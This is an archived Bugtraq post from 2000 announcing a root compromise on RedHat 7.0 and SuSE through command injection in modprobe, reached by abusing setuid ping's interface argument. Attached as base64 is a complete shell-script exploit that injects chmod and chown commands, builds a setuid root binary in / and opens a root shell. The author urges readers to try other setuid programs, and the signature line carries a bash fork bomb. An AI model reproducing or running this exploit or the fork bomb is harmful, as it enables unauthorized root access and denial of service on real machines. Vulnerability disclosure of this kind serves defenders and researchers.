[17619] in bugtraq
RedHat 7.0 (and SuSE): modutils + netkit = root compromise. (fwd)
daemon@ATHENA.MIT.EDU (Michal Zalewski)
Mon Nov 13 01:06:35 2000
MIME-Version: 1.0
Content-Type: MULTIPART/Mixed; BOUNDARY="453665793-985387990-973607392=:14684"
Content-ID: <Pine.LNX.4.21.0011071540530.14790@nimue.tpi.pl>
Message-ID: <Pine.LNX.4.21.0011122236400.23718-200000@nimue.tpi.pl>
Date: Sun, 12 Nov 2000 22:46:53 +0100
Reply-To: Michal Zalewski <lcamtuf@TPI.PL>
From: Michal Zalewski <lcamtuf@TPI.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--453665793-985387990-973607392=:14684
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <Pine.LNX.4.21.0011071540531.14790@nimue.tpi.pl>
Motto from the modprobe manpage: "BUGS: Naah..."
------------------------------------------------
This vulnerability has been found by Sebastian Krahmer some time ago (he
is posting an advisory right now). Stupid shell command execution within
userspace kernel helper application, modprobe, is something you do not
want to see. But it happened. I have no idea how could it be introduced in
RH 7.0 systems and some other distros (like recent SuSE), but it was. Ugh.
Well, Sebastian believed this vulnerability is really difficult to exploit
(at least in standard configurations). I had the same feeling about it.
But, after being asked by Sebastian to do it, I've found some time and
decided to investigate it more carefully. First of all, I've tried to find
any way to exploit it in RH 6.2 environment with "upgraded" modprobe. No
success. Then, I've switched to brand new, shiny RH 7.0 installation. And
voila - nothing easier. Attached exploit is somewhat hackish - abusing new
ping utility in this system to exploit modprobe vulnerability. As slashes
in device name are rejected by modprobe and environment is not preserved,
this exploit works in really weird way, operating on modprobe's pwd (/),
making it world-writable for a second.
NOTE: if this exploit fails, it does not have to mean your modprobe is
secure; it might mean your system is equipped with, for example, old
/bin/ping utility, instead of new iputils software. You should be aware
that RedHat released some iputils updates, which apparently seems to
"accidentally" fix this particular way to exploit it. But this utility is
only an instrument used to exploit the bug. You can play with other setuid
programs, /bin/ping6, privledged services etc. Be creative.
Well, two applications were upgraded and shipped in the manner which opens
really huge root compromise possibility. Well done, RedHat :)
Greetings to Sebastian, of course, to Solar Designer, kil3r, Nises, Scott,
Dave, Simple Nomad, Aleph One, #hax and all the people :)
_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
--453665793-985387990-973607392=:14684
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME=exploit
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0011071645001.14943@nimue.tpi.pl>
Content-Description:
Content-Disposition: ATTACHMENT; FILENAME=exploit
IyEvYmluL3NoDQoNCmVjaG8NCmVjaG8gIlJlZEhhdCA3LjAgbW9kdXRpbHMg
ZXhwbG9pdCINCmVjaG8gIihjKSAyMDAwIE1pY2hhbCBaYWxld3NraSA8bGNh
bXR1ZkBpZHMucGw+Ig0KZWNobyAiQnVnIGRpc2NvdmVyeTogU2ViYXN0aWFu
IEtyYWhtZXIgPGtyYWhtZXJAY3MudW5pLXBvdHNkYW0uZGU+Ig0KZWNobw0K
ZWNobyAiRG8gbm90IGhhdmUgdG8gd29yayBvbiBvbGRlciAvIG5vbi1SSCBz
eXN0ZW1zLiBUaGlzIGJ1ZyBoYXMgYmVlbiINCmVjaG8gImludHJvZHVjZWQg
cmVjZW50bHkuIEVuam95IDopIg0KZWNobw0KZWNobyAiVGhpcyBleHBsb2l0
IGlzIHJlYWxseSBoYWNraXNoLCBiZWNhdXNlIHNsYXNoZXMgYXJlIG5vdCBh
bGxvd2VkIGluIg0KZWNobyAibW9kcHJvYmUgcGFyYW1ldGVycywgdGh1cyB3
ZSBoYXZlIHRvIHBsYXkgaW4gbW9kcHJvYmUncyBjd2QgKC8pLiINCmVjaG8N
Cg0KUElORz0vYmluL3Bpbmc2DQp0ZXN0IC11ICRQSU5HIHx8IFBJTkc9L2Jp
bi9waW5nDQoNCmlmIFsgISAtdSAkUElORyBdOyB0aGVuDQogIGVjaG8gIlNv
cnJ5LCBubyBzZXR1aWQgcGluZy4iDQogIGV4aXQgMA0KZmkNCg0KZWNobyAi
UGhhc2UgMTogbWFraW5nIC8gd29ybGQtd3JpdGFibGUuLi4iDQoNCiRQSU5H
IC1JICc7Y2htb2Qgbyt3IC4nIDE5NS4xMTcuMy41OSAmPi9kZXYvbnVsbA0K
DQpzbGVlcCAxDQoNCmVjaG8gIlBoYXNlIDI6IGNvbXBpbGluZyBoZWxwZXIg
YXBwbGljYXRpb24gaW4gLy4uLiINCg0KY2F0ID4veC5jIDw8X2VvZl8NCm1h
aW4oKSB7DQogIHNldHVpZCgwKTsgc2V0ZXVpZCgwKTsNCiAgc3lzdGVtKCJj
aG1vZCA3NTUgLztybSAtZiAveDsgcm0gLWYgL3guYyIpOw0KICBleGVjbCgi
L2Jpbi9iYXNoIiwiYmFzaCIsIi1pIiwwKTsNCn0NCl9lb2ZfDQoNCmdjYyAv
eC5jIC1vIC94DQpjaG1vZCA3NTUgL3gNCg0KZWNobyAiUGhhc2UgMzogY2hv
d24rY2htb2Qgb24gb3VyIGhlbHBlciBhcHBsaWNhdGlvbi4uLiINCg0KJFBJ
TkcgLUkgJztjaG93biAwIHgnIDE5NS4xMTcuMy41OSAmPi9kZXYvbnVsbA0K
c2xlZXAgMQ0KJFBJTkcgLUkgJztjaG1vZCArcyB4JyAxOTUuMTE3LjMuNTkg
Jj4vZGV2L251bGwNCnNsZWVwIDENCg0KaWYgWyAhIC11IC94IF07IHRoZW4N
CiAgZWNobyAiQXBwYXJlbnRseSwgdGhpcyBpcyBub3QgZXhwbG9pdGFibGUg
b24gdGhpcyBzeXN0ZW0gOigiDQogIGV4aXQgMQ0KZmkNCg0KZWNobyAiVm9p
bGEhIEVudGVyaW5nIHJvb3RzaGVsbC4uLiINCg0KL3gNCg0KZWNobyAiVGhh
bmsgeW91LiINCg==
--453665793-985387990-973607392=:14684--
